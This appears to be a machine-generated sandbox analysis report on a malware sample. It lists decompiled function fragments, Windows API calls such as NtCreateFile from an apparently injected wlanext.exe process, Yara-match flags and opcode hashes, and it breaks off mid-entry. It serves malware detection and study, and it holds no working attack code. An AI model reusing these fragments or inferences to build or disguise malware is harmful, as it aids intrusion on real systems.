                                                                                    C-Code - Quality: 100%
                                                                                    			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                    0x00418513
                                                                                    0x0041852a
                                                                                    0x00418538

                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                    • Instruction ID: 945a714f111609a382a60f3185fa051e5cbae16d842d86037fbe94dd3358aa8b
                                                                                    • Opcode Fuzzy Hash: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                    • Instruction Fuzzy Hash: 9CB09B71D014C5D5D711D7714608717795077D0741F16C061D1020681B4778C495F5B6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00406A95, Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: db7258001cee886dad1c17700cef2123638df1d5e441e5de0653215e65693d96
                                                                                    • Instruction ID: bc00b4f745960c86fc0b0837f44edcc9ab379ea7262dd83db2f04d1ef488ce98
                                                                                    • Opcode Fuzzy Hash: db7258001cee886dad1c17700cef2123638df1d5e441e5de0653215e65693d96
                                                                                    • Instruction Fuzzy Hash: 55D023329051504FC6255C18D49057DF394DB57230F045257CC9CB3141515DD44045C9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A598A0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 60e4aad80b6f760886f8a05041107d150768315d66f759f78f9203afdf1f24ed
                                                                                    • Instruction ID: 2987a09630db0fbb9c46f72c800237d71ceae9f12b02d088a42a9a4afa574b3a
                                                                                    • Opcode Fuzzy Hash: 60e4aad80b6f760886f8a05041107d150768315d66f759f78f9203afdf1f24ed
                                                                                    • Instruction Fuzzy Hash: BB90026170100802D302616A44146060019D7D13C5F91C022E1414555D8A658953F172
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59820, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4f64dcea814e90b3ee363067fd54932ab03e4215d539d2d25d5ffc9417fce5d1
                                                                                    • Instruction ID: fbf07fed5c314c97f9f0da82b15ff61392bdeb3e5564d40f7f5e34b077a5ba07
                                                                                    • Opcode Fuzzy Hash: 4f64dcea814e90b3ee363067fd54932ab03e4215d539d2d25d5ffc9417fce5d1
                                                                                    • Instruction Fuzzy Hash: 3B90027174100802D341716A44046060019A7D03C1F91C022A0414554E8A958A56FAA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5B040, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26fb3d24b78f9b938cec50c11c95e41693eb5b2a5b75fd9e30cd05276294299a
                                                                                    • Instruction ID: 234e8582c2fb9eb70209d30951ff7538bc5bfe90bac8e160eff6fa2f2a2a888b
                                                                                    • Opcode Fuzzy Hash: 26fb3d24b78f9b938cec50c11c95e41693eb5b2a5b75fd9e30cd05276294299a
                                                                                    • Instruction Fuzzy Hash: 049002A1B01144438740B16A48044065025A7E1381391C131A0444560C8AA88855E2A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A595F0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7bea75ebc9da8c6a2125dc3f62a5fe902fa6d102cc961afd9e8da8918316a6e2
                                                                                    • Instruction ID: 6b3ca22e77d4bd3477dd109b217c8f52dcc50bc9beb1f9bb74c55d572ab12bc0
                                                                                    • Opcode Fuzzy Hash: 7bea75ebc9da8c6a2125dc3f62a5fe902fa6d102cc961afd9e8da8918316a6e2
                                                                                    • Instruction Fuzzy Hash: 0C90027170100C02D304616A4804686001597D0381F51C021A6014655E9AA58891B171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A599D0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ca3248f921ef603c34cfc816ddda64cd90bd57a6fdb2971999981bf78ef902e
                                                                                    • Instruction ID: 10a62ad981d118d3940a345dbd293e87c4edc8aac5d06c020b2afdbfb37a0973
                                                                                    • Opcode Fuzzy Hash: 6ca3248f921ef603c34cfc816ddda64cd90bd57a6fdb2971999981bf78ef902e
                                                                                    • Instruction Fuzzy Hash: 239002A171100442D304616A4404706005597E1381F51C022A2144554CC9698C61A165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59520, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6581b85d77039e89b4aea0b02294e17518592b074e8a8171633796c24ed1b353
                                                                                    • Instruction ID: fa225c09a8c54b6297f979ee1cfb6aee42d67295d01245fcfd58633eab68ce8c
                                                                                    • Opcode Fuzzy Hash: 6581b85d77039e89b4aea0b02294e17518592b074e8a8171633796c24ed1b353
                                                                                    • Instruction Fuzzy Hash: 379002E1701144928700A26A8404B0A451597E0381B51C026E1044560CC9658851E175
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5AD30, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 14f25a4a2142aeb4b5e4b9dd9d50ae8b77f69d57d34cbd5371cc0299565fb7e2
                                                                                    • Instruction ID: c8abd851870ab20bc8f00d6b9e488a078dddcdceab4df3342e0e5bf30f5e3a79
                                                                                    • Opcode Fuzzy Hash: 14f25a4a2142aeb4b5e4b9dd9d50ae8b77f69d57d34cbd5371cc0299565fb7e2
                                                                                    • Instruction Fuzzy Hash: 2A900271F0500412D340716A48146464016A7E07C1B55C021A0504554C8D948A55A3E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59560, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2afe2c7116240338c62344602576931ca384eeb62837b59f9297fe910b2c6270
                                                                                    • Instruction ID: 868514365295cb7cfd5769f473376d420ef09cbff1c2c59905cef55dc6045a6c
                                                                                    • Opcode Fuzzy Hash: 2afe2c7116240338c62344602576931ca384eeb62837b59f9297fe910b2c6270
                                                                                    • Instruction Fuzzy Hash: FD900265721004024345A56A060450B0455A7D63D1391C025F1406590CCA618865A361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59950, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e0f9e066e508c46e8047d538309b0a840d095bb578d692499aedce38a359973
                                                                                    • Instruction ID: 4954d17c2f9378b758a3b5ca8e1d7671be1f4eeac5a586474417945619f66b66
                                                                                    • Opcode Fuzzy Hash: 3e0f9e066e508c46e8047d538309b0a840d095bb578d692499aedce38a359973
                                                                                    • Instruction Fuzzy Hash: 029002A170140803D340656A4804607001597D0382F51C021A2054555E8E698C51B175
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59A80, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 800ce9d9047692d8d2dda0717ccc7fb0c2198e930e2e6fbcdc4ba168c4e1f4f9
                                                                                    • Instruction ID: d1ee7f42166413eceb4b3480bd9dcba90b6aec5323cd8be0f8e646ef54207a21
                                                                                    • Opcode Fuzzy Hash: 800ce9d9047692d8d2dda0717ccc7fb0c2198e930e2e6fbcdc4ba168c4e1f4f9
                                                                                    • Instruction Fuzzy Hash: 2D90026170144842D340626A4804B0F411597E1382F91C029A4146554CCD558855A761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A596D0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 547e7263300305bacad5700721f1a013a47eaeedd4fe78017a8fc65332a93f24
                                                                                    • Instruction ID: 2bc6b03f6781147abed2276374c46b7803a844d2ec86a54a67506e7405b0f21c
                                                                                    • Opcode Fuzzy Hash: 547e7263300305bacad5700721f1a013a47eaeedd4fe78017a8fc65332a93f24
                                                                                    • Instruction Fuzzy Hash: A590027170100C42D300616A4404B46001597E0381F51C026A0114654D8A55C851B561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59A10, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18e9ba019d475bd8cb16a1faccc91c10b72edb77762ae418476394c6ed300a9
                                                                                    • Instruction ID: d067022e2a3dfbf548bc426806e11add1ef2d9ca10c17205a9679639b00347c1
                                                                                    • Opcode Fuzzy Hash: b18e9ba019d475bd8cb16a1faccc91c10b72edb77762ae418476394c6ed300a9
                                                                                    • Instruction Fuzzy Hash: 7E90027170140802D300616A4808747001597D0382F51C021A5154555E8AA5C891B571
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59610, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94f327ebc8155fd491a230bb9be0e562dd32e8370c5c370c665b51d387c05fba
                                                                                    • Instruction ID: d01cda69ddd286614ec3ac3e1b02f756b76acb9fc91853aeaad9d2e3e935f168
                                                                                    • Opcode Fuzzy Hash: 94f327ebc8155fd491a230bb9be0e562dd32e8370c5c370c665b51d387c05fba
                                                                                    • Instruction Fuzzy Hash: DE900271B0500C02D350716A4414746001597D0381F51C021A0014654D8B958A55B6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59650, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4168470acc7d4fc2b334e9a25f6eca678e56bfcbf08ba7eb2f9f7dc0cce16641
                                                                                    • Instruction ID: 0a8c12f2466d8d41612476ec1acd31cf16e393dec442fac301bec0143a61f65c
                                                                                    • Opcode Fuzzy Hash: 4168470acc7d4fc2b334e9a25f6eca678e56bfcbf08ba7eb2f9f7dc0cce16641
                                                                                    • Instruction Fuzzy Hash: 2990027170504C42D340716A4404A46002597D0385F51C021A0054694D9A658D55F6A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c132fa9284f0021c083b27fe69938f287d6f268bf79eb8103df188d84bf3a515
                                                                                    • Instruction ID: cfe3fe6c173d850b86605dbf53a6e5b25a3fa50c7ad28b969efdcdd43e74d0a8
                                                                                    • Opcode Fuzzy Hash: c132fa9284f0021c083b27fe69938f287d6f268bf79eb8103df188d84bf3a515
                                                                                    • Instruction Fuzzy Hash: 6590027170144402D340716A844460B5015A7E0381F51C421E0415554C8A558856E261
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59730, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 906a469c982250e662efd61cf23d74e787cf510b14f0ac44c018bfee6b3a0a60
                                                                                    • Instruction ID: e840b61699085815638aa39ad4a1992f133c320df279006376f29f74376f1b39
                                                                                    • Opcode Fuzzy Hash: 906a469c982250e662efd61cf23d74e787cf510b14f0ac44c018bfee6b3a0a60
                                                                                    • Instruction Fuzzy Hash: 93900261B0500802D340716A5418706002597D0381F51D021A0014554DCA998A55B6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59B00, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bde3052fe203b7a167b71130aa9e3354b75887ff905c39edf727be5cfd1bd38
                                                                                    • Instruction ID: 3459cbfbc7aab1563a6ebbf1177803b6d0751a19783d8bf6eaf773831e8e53b0
                                                                                    • Opcode Fuzzy Hash: 0bde3052fe203b7a167b71130aa9e3354b75887ff905c39edf727be5cfd1bd38
                                                                                    • Instruction Fuzzy Hash: DA90026174100C02D340716A84147070016D7D0781F51C021A0014554D8A568965B6F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5A710, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30a05049fcf5ae7b5a8513abbccdd28dfe78888f572bc0c5e74b558472f43375
                                                                                    • Instruction ID: f49d7bfcf6e90c3ad42a3b308cf3c38439a6744f94b94af8095fd73bb86069b9
                                                                                    • Opcode Fuzzy Hash: 30a05049fcf5ae7b5a8513abbccdd28dfe78888f572bc0c5e74b558472f43375
                                                                                    • Instruction Fuzzy Hash: 0690027170100452D700A6AA5804A4A411597F0381B51D025A4004554C89948861A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59760, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c59cca0b02ed253804d8a0bd7c2dfc42e0eb65c358341315efc516856ff3b93
                                                                                    • Instruction ID: 262911b63e56bfc601bb4f549643863c82ecea29b90425f194f4f392652b98b4
                                                                                    • Opcode Fuzzy Hash: 9c59cca0b02ed253804d8a0bd7c2dfc42e0eb65c358341315efc516856ff3b93
                                                                                    • Instruction Fuzzy Hash: C990027170100803D300616A5508707001597D0381F51D421A0414558DDA968851B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59770, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff9109ca0ce587e58469bc6cd73ebd817e84d91fadef3fd4f9fa22a3a3a8b50c
                                                                                    • Instruction ID: 32fda7d9acaf9286bea4b0fbb87ebe13262a096247df258e93970f8a04dff8f1
                                                                                    • Opcode Fuzzy Hash: ff9109ca0ce587e58469bc6cd73ebd817e84d91fadef3fd4f9fa22a3a3a8b50c
                                                                                    • Instruction Fuzzy Hash: DC90026170504842D300656A5408A06001597D0385F51D021A1054595DCA758851F171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A5A770, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c53b6d61d5acc9dc22581f5cb4a66740efc29fc4b14538f57c8fbddb726da560
                                                                                    • Instruction ID: b42be46cfa720c2f92852071326484af00ddcc79d18230441227716520098363
                                                                                    • Opcode Fuzzy Hash: c53b6d61d5acc9dc22581f5cb4a66740efc29fc4b14538f57c8fbddb726da560
                                                                                    • Instruction Fuzzy Hash: F590027570504842D700656A5804A87001597D0385F51D421A041459CD8A948861F161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59670, Relevance: .0, Instructions: 2COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 09fa16911075f6781cb28dc2b5da37f01064c6c88dde8d930621b0190a18a43c
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00AAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E00AAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                    0x00aafdda
                                                                                    0x00aafde2
                                                                                    0x00aafde5
                                                                                    0x00aafdec
                                                                                    0x00aafdfa
                                                                                    0x00aafdff
                                                                                    0x00aafe0a
                                                                                    0x00aafe0f
                                                                                    0x00aafe17
                                                                                    0x00aafe1e
                                                                                    0x00aafe19
                                                                                    0x00aafe19
                                                                                    0x00aafe19
                                                                                    0x00aafe20
                                                                                    0x00aafe21
                                                                                    0x00aafe22
                                                                                    0x00aafe25
                                                                                    0x00aafe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAFDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AAFE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AAFE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                    • Instruction ID: 910e455111a69d8b8af75ac2cc0b27ebdce503809dccb35f03805d19378c1c70
                                                                                    • Opcode Fuzzy Hash: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                    • Instruction Fuzzy Hash: 39F0F632600601BFEA241A95DD06F37BF6AEB45730F240715F628565E1EA62F82097F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: wlanext.exe PID: 5876 Parent PID: 3424 wlanext.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 010481BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,01043B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01043B97,007A002E,00000000,00000060,00000000,00000000), ref: 0104820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                                                    • Instruction ID: 9881a6b67b4cf56447b3095b94f5d8aa0da8534b71bb47ae7d917041bcdecacf
                                                                                    • Opcode Fuzzy Hash: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                                                    • Instruction Fuzzy Hash: A901B2B2241108AFCB18DF98DC85EEB77E9AF8C754F158658FA0DE7240C630E811CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010481C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,01043B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01043B97,007A002E,00000000,00000060,00000000,00000000), ref: 0104820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction ID: 4222f29cc92c583b66dbc241cb6904140f4372a854663968a292200174093cc2
                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction Fuzzy Hash: 84F0B2B2201208ABCB08DF88DC84EEB77ADAF8C754F158648FA0D97240C630E811CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010482EA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(01043D30,?,?,01043D30,00000000,FFFFFFFF), ref: 01048315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                                                    • Instruction ID: 8ef1a36df696cf7d0e33211735ec1feeaaa94b040726fecee27b0bb93cf69c0e
                                                                                    • Opcode Fuzzy Hash: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                                                    • Instruction Fuzzy Hash: 35F082B6200114ABD710EFD8DC80EEB776DEF88320F14CA59FA5C9B241C630E9118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01048270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
